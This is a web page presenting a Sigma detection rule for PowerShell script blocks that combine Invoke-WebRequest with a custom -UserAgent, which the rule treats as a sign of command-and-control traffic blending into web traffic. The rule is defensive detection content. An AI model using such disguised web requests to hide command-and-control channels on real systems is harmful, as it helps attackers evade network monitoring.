Change User Agents with WebRequest
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Sigma rule (View on GitHub)
1title: Change User Agents with WebRequest
2id: d4488827-73af-4f8d-9244-7b7662ef046e
3status: test
4description: |
5 Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
6 Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
7references:
8 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
9author: frack113
10date: 2022/01/23
11modified: 2023/01/02
12tags:
13 - attack.command_and_control
14 - attack.t1071.001
15logsource:
16 product: windows
17 category: ps_script
18 definition: 'Requirements: Script Block Logging must be enabled'
19detection:
20 selection:
21 ScriptBlockText|contains|all:
22 - 'Invoke-WebRequest'
23 - '-UserAgent '
24 condition: selection
25falsepositives:
26 - Unknown
27level: medium
References
Related rules
- Renamed Visual Studio Code Tunnel Execution
- Visual Studio Code Tunnel Execution
- Visual Studio Code Tunnel Service Installation
- Visual Studio Code Tunnel Shell Execution
- Suspicious User Agent